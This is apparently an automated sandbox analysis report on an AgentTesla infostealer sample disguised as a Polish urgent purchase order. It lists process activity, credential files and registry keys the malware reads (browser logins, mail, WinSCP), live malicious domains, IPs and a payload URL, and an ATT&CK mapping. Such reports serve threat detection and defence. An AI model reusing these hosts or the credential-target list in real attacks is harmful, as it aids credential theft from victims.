Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe

Code function: 1_2_00405D1B GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

1_2_00405D1B

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000089.00000002.18044285630.000000003418B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5424, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Source: Yara match	File source: 00000089.00000002.18044285630.000000003418B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5424, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000089.00000002.18044285630.000000003418B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 5424, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Exfiltration Over Alternative Protocol	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	117 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	111 Process Injection	1 Obfuscated Files or Information	Security Account Manager	311 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 DLL Side-Loading	NTDS	231 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	23 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	231 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Time Based Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Time Based Evasion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	10%	ReversingLabs
Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	33%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\nsgB1F9.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsgB1F9.tmp\nsExec.dll	2%	ReversingLabs
C:\Users\user\Pacifisterne\Automatcafeer\Nedrustningspolitikken\Dilemmaers146\Glasgaibleanir\Nodebilledet\Microsoft.Practices.Composite.UnityExtensions.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.0.Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491		Download File
1.2.Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491		Download File

Domains

Source	Detection	Scanner	Label	Link
sentientshift.com	0%	Virustotal		Browse
ftp.sentientshift.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://enlluec.tk/	0%	Avira URL Cloud	safe
http://sentientshift.com	0%	Avira URL Cloud	safe
http://ftp.sentientshift.com	0%	Avira URL Cloud	safe
https://enlluec.tk/dkVAJHULLLAJIKvMzyyDm233.pcx	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api4.ipify.org	64.185.227.155	true	false		high
sentientshift.com	192.185.87.146	true	false	0%, Virustotal, Browse	unknown
enlluec.tk	103.83.194.19	true	false		unknown
ftp.sentientshift.com	unknown	unknown	true	0%, Virustotal, Browse	unknown
api.ipify.org	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://enlluec.tk/dkVAJHULLLAJIKvMzyyDm233.pcx	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ftp.sentientshift.com	CasPol.exe, 00000089.00000002.18044285630.00000000341E4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000003.13041218149.0000000002932000.00000004.00000020.00020000.00000000.sdmp, default.css.1.dr	false		high
https://api.ipify.org	CasPol.exe, 00000089.00000002.18044285630.0000000034141000.00000004.00000800.00020000.00000000.sdmp	false		high
http://sentientshift.com	CasPol.exe, 00000089.00000002.18044285630.00000000341E4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://creativecommons.org/licenses/by-sa/4.0/	application-x-executable.png.1.dr	false		high
http://nsis.sf.net/NSIS_Error	Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	false		high
http://nsis.sf.net/NSIS_ErrorError	Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CasPol.exe, 00000089.00000002.18044285630.0000000034141000.00000004.00000800.00020000.00000000.sdmp	false		high
http://mozilla.org/MPL/2.0/.	Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe, 00000001.00000003.13041218149.0000000002932000.00000004.00000020.00020000.00000000.sdmp, default.css.1.dr	false		high
https://enlluec.tk/	CasPol.exe, 00000089.00000002.18026950300.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000089.00000002.18026950300.000000000378B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.83.194.19	enlluec.tk	United States	132335	NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN	false
192.185.87.146	sentientshift.com	United States	46606	UNIFIEDLAYER-AS-1US	false
64.185.227.155	api4.ipify.org	United States	18450	WEBNXUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	791299
Start date and time:	2023-01-25 10:02:02 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	141
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@400/11@3/3
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 48.8% (good quality ratio 48.1%) Quality average: 87.4% Quality standard deviation: 21.9%
HCA Information:	Successful, ratio: 93% Number of executed functions: 74 Number of non-executed functions: 30
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, spclient.wg.spotify.com, wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Execution Graph export aborted for target CasPol.exe, PID 5424 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.83.194.19	inq 0394511 JPG.exe	Get hash	malicious	Browse
	recibo de pago 00028384757767868 01172023.exe	Get hash	malicious	Browse
	DEME DEKONTU 000284757757575756 01172023.exe	Get hash	malicious	Browse
	copia de pago 000284857577688 01162023.exe	Get hash	malicious	Browse
	ODEME BILGILENDIRME 000284857577688 01162023.exe	Get hash	malicious	Browse
	IMG-20221229-WA0012.jpg.exe	Get hash	malicious	Browse
	Delivery Confirmation.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.GenKryptik.FYXW.tr.26324.25853.exe	Get hash	malicious	Browse
	https://www.smore.com/rk3tf	Get hash	malicious	Browse
192.185.87.146	400000.CasPol.bin.exe	Get hash	malicious	Browse
64.185.227.155	xc17rfFdOM.exe	Get hash	malicious	Browse	api.ipify.org/?format=wef
	8Ghi4RAfH5.exe	Get hash	malicious	Browse	api.ipify.org/?format=wef
	fb623f4ae4dcaa007cac4365aa3ce13526ae32b94f2d9.exe	Get hash	malicious	Browse	api.ipify.org/?format=wef
	file.exe	Get hash	malicious	Browse	api.ipify.org/?format=wef
	48PTRR4pVY.exe	Get hash	malicious	Browse	api.ipify.org/?format=qwd

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api4.ipify.org	Pagamento01242023,jpg.exe	Get hash	malicious	Browse	64.185.227.155
	PI_NBI-2250123(MECH)_pdf.exe	Get hash	malicious	Browse	64.185.227.155
	DHL Express Shipping DOC.exe	Get hash	malicious	Browse	64.185.227.155
	FedEx Express Receipt_AWB#53053232004643.exe	Get hash	malicious	Browse	64.185.227.155
	xc17rfFdOM.exe	Get hash	malicious	Browse	64.185.227.155
	PROFOMA FACTURA 24012023_PDF.com.exe	Get hash	malicious	Browse	64.185.227.155
	SOA.exe	Get hash	malicious	Browse	64.185.227.155
	EFT_Receipts.htm	Get hash	malicious	Browse	173.231.16.76
	Direct Deposit Processed 1242023.html	Get hash	malicious	Browse	64.185.227.155
	file0651.xlsm	Get hash	malicious	Browse	64.185.227.155
	VH3dPdX2xF.exe	Get hash	malicious	Browse	64.185.227.155
	PAYMENT USD 1,059.2.xls	Get hash	malicious	Browse	64.185.227.155
	xbg2Upk64H.exe	Get hash	malicious	Browse	64.185.227.155
	qYg5340gEj.exe	Get hash	malicious	Browse	64.185.227.155
	FNX Proforma Incoice No; INV 20231131003197231. 18.12.2022. SOA ref 202212234351972101.pdf.exe	Get hash	malicious	Browse	173.231.16.76
	inq 0394511 JPG.exe	Get hash	malicious	Browse	173.231.16.76
	HSBC PAYMENT.pdf.exe	Get hash	malicious	Browse	64.185.227.155
	Quotation.exe	Get hash	malicious	Browse	64.185.227.155
	Qoutation.exe	Get hash	malicious	Browse	64.185.227.155
	Files pdf.html	Get hash	malicious	Browse	64.185.227.155
enlluec.tk	inq 0394511 JPG.exe	Get hash	malicious	Browse	103.83.194.19

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN	inq 0394511 JPG.exe	Get hash	malicious	Browse	103.83.194.19
	recibo de pago 00028384757767868 01172023.exe	Get hash	malicious	Browse	103.83.194.19
	DEME DEKONTU 000284757757575756 01172023.exe	Get hash	malicious	Browse	103.83.194.19
	copia de pago 000284857577688 01162023.exe	Get hash	malicious	Browse	103.83.194.19
	ODEME BILGILENDIRME 000284857577688 01162023.exe	Get hash	malicious	Browse	103.83.194.19
	XmjQYnQ0Kl.elf	Get hash	malicious	Browse	45.120.142.226
	YyuAx70aQL.elf	Get hash	malicious	Browse	45.120.142.216
	IMG-20221229-WA0012.jpg.exe	Get hash	malicious	Browse	103.83.194.19
	Delivery Confirmation.exe	Get hash	malicious	Browse	103.83.194.19
	mt4setup.exe	Get hash	malicious	Browse	103.26.205.122
	SecuriteInfo.com.W32.GenKryptik.FYXW.tr.26324.25853.exe	Get hash	malicious	Browse	103.83.194.19
	https://www.smore.com/rk3tf	Get hash	malicious	Browse	103.83.194.19
	mt4setup.exe	Get hash	malicious	Browse	103.26.205.122
	https://gearsas.tk/Aza/quad	Get hash	malicious	Browse	103.83.194.50
	PO 97594_JPG.vbs	Get hash	malicious	Browse	103.83.194.50
	SWIFT.103_1873530473_PDF.vbs	Get hash	malicious	Browse	103.83.194.50
	SWIFT.103_18735_PDF.vbs	Get hash	malicious	Browse	103.83.194.50
	Offer 1049346 xlsx.vbs	Get hash	malicious	Browse	103.83.194.50
	Packing list ASPL22-23-1504_jpg.vbs	Get hash	malicious	Browse	103.83.194.50
	B8BuahzlPU	Get hash	malicious	Browse	168.81.254.154
UNIFIEDLAYER-AS-1US	new order 00029485886459966 dated 25012023.exe	Get hash	malicious	Browse	192.185.48.122
	http://getyourbabysat.biz/came/index.html#jolette.l@greenmined.co.za	Get hash	malicious	Browse	192.185.236.198
	COMPUTATION DOC.exe	Get hash	malicious	Browse	74.220.199.6
	Completed Signed Agreement.htm	Get hash	malicious	Browse	192.232.220.138
	Direct Deposit Processed 1242023.html	Get hash	malicious	Browse	192.185.74.124
	ACH Remittance.htm	Get hash	malicious	Browse	192.232.220.138
	https://crownlandm.com/i/i/	Get hash	malicious	Browse	69.49.244.168
	http://www.lartimista.com/	Get hash	malicious	Browse	69.49.230.239
	Payapp L12217 updated January 24 2023 from Dell Pty Ltd.msg	Get hash	malicious	Browse	50.87.153.89
	Inquiry.exe	Get hash	malicious	Browse	162.241.60.173
	https://www.jycequipment.com/	Get hash	malicious	Browse	173.254.29.53
	bineze.bin.exe	Get hash	malicious	Browse	162.241.217.45
	Purchase order 3812_xls_.exe.exe	Get hash	malicious	Browse	192.185.154.201
	Purchase order 3812_xls_.exe.exe	Get hash	malicious	Browse	192.185.154.201
	400000.CasPol.bin.exe	Get hash	malicious	Browse	192.185.87.146
	https://number77.s3.us-west-004.backblazeb2.com/index+(3).html	Get hash	malicious	Browse	69.49.229.176
	SHIPPING DOC.exe	Get hash	malicious	Browse	50.87.139.143
	Remittance&invoicing25817.html	Get hash	malicious	Browse	192.185.106.11
	https://www.smore.com/93xgp	Get hash	malicious	Browse	69.49.244.168
	ATT41212.htm	Get hash	malicious	Browse	50.87.145.227

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Pagamento01242023,jpg.exe	Get hash	malicious	Browse	64.185.227.155
	PI_NBI-2250123(MECH)_pdf.exe	Get hash	malicious	Browse	64.185.227.155
	LibreOffice-release.exe	Get hash	malicious	Browse	64.185.227.155
	DHL Express Shipping DOC.exe	Get hash	malicious	Browse	64.185.227.155
	FedEx Express Receipt_AWB#53053232004643.exe	Get hash	malicious	Browse	64.185.227.155
	HEUR-Trojan.Win32.Crypt.gen-e026bc9a0b7ac31a8.exe	Get hash	malicious	Browse	64.185.227.155
	PROFOMA FACTURA 24012023_PDF.com.exe	Get hash	malicious	Browse	64.185.227.155
	SOA.exe	Get hash	malicious	Browse	64.185.227.155
	QUOTATION.exe	Get hash	malicious	Browse	64.185.227.155
	file0651.xlsm	Get hash	malicious	Browse	64.185.227.155
	VH3dPdX2xF.exe	Get hash	malicious	Browse	64.185.227.155
	https://kevins-team-121.adalo.com/kevin	Get hash	malicious	Browse	64.185.227.155
	xbg2Upk64H.exe	Get hash	malicious	Browse	64.185.227.155
	qYg5340gEj.exe	Get hash	malicious	Browse	64.185.227.155
	FNX Proforma Incoice No; INV 20231131003197231. 18.12.2022. SOA ref 202212234351972101.pdf.exe	Get hash	malicious	Browse	64.185.227.155
	inq 0394511 JPG.exe	Get hash	malicious	Browse	64.185.227.155
	HSBC PAYMENT.pdf.exe	Get hash	malicious	Browse	64.185.227.155
	Quotation.exe	Get hash	malicious	Browse	64.185.227.155
	Qoutation.exe	Get hash	malicious	Browse	64.185.227.155
	INVOICE10321.exe	Get hash	malicious	Browse	64.185.227.155
37f463bf4616ecd445d4a1937da06e19	aw9Ynwqd1x.exe	Get hash	malicious	Browse	103.83.194.19
	file.exe	Get hash	malicious	Browse	103.83.194.19
	tPR99t7HF1.exe	Get hash	malicious	Browse	103.83.194.19
	YrD1BC1bsf.exe	Get hash	malicious	Browse	103.83.194.19
	file.exe	Get hash	malicious	Browse	103.83.194.19
	file.exe	Get hash	malicious	Browse	103.83.194.19
	D5BA7A1B36FD9BFDDC5F9AC2299F23632E21933F052B4.exe	Get hash	malicious	Browse	103.83.194.19
	file.exe	Get hash	malicious	Browse	103.83.194.19
	file.exe	Get hash	malicious	Browse	103.83.194.19
	HEUR-Trojan.Win32.Crypt.gen-e026bc9a0b7ac31a8.exe	Get hash	malicious	Browse	103.83.194.19
	E9387D76F1601429FE70F70A48B966F2EF98C5E07A612.exe	Get hash	malicious	Browse	103.83.194.19
	ZVKooVE7gN.exe	Get hash	malicious	Browse	103.83.194.19
	file.exe	Get hash	malicious	Browse	103.83.194.19
	https://rise.articulate.com/share/oIPGqlcs4YAbJcrgqMshXod7_KpoUrxZ#/lessons/BiUk3l0uXFxpT9YJvNRZHEHdLBAIWErX	Get hash	malicious	Browse	103.83.194.19
	file.exe	Get hash	malicious	Browse	103.83.194.19
	#U25b6#Ufe0f#Ud83d#Udd18#U2500#U2500 #U266b Audio-0056secs.HTM	Get hash	malicious	Browse	103.83.194.19
	https://hicksronaldbown.com/	Get hash	malicious	Browse	103.83.194.19
	EFT_Receipts.htm	Get hash	malicious	Browse	103.83.194.19
	Completed Signed Agreement.htm	Get hash	malicious	Browse	103.83.194.19
	Remittance Advice.htm	Get hash	malicious	Browse	103.83.194.19

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\nsgB1F9.tmp\System.dll	inq 0394511 JPG.exe	Get hash	malicious	Browse
	inq 0394511 JPG.exe	Get hash	malicious	Browse
	Purchase order 3812_xls_.exe.exe	Get hash	malicious	Browse
	Purchase order 3812_xls_.exe.exe	Get hash	malicious	Browse
	Purchase order 3812_xls_.exe.exe	Get hash	malicious	Browse
	Purchase order 3812_xls_.exe.exe	Get hash	malicious	Browse
	Purchase order 3812_xls_.exe.exe	Get hash	malicious	Browse
	Scan_Doc.docx.exe	Get hash	malicious	Browse
	Scan_Doc.docx.exe	Get hash	malicious	Browse
	KoRdtkxn6c.exe	Get hash	malicious	Browse
	KoRdtkxn6c.exe	Get hash	malicious	Browse
	Jjfmcz1Hsz.exe	Get hash	malicious	Browse
	Jjfmcz1Hsz.exe	Get hash	malicious	Browse
	PmRXFyOFkf.exe	Get hash	malicious	Browse
	PmRXFyOFkf.exe	Get hash	malicious	Browse
	Lakeringernes (1).exe	Get hash	malicious	Browse
	Lakeringernes (1).exe	Get hash	malicious	Browse
	proforma.exe	Get hash	malicious	Browse
	proforma.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsgB1F9.tmp\System.dll

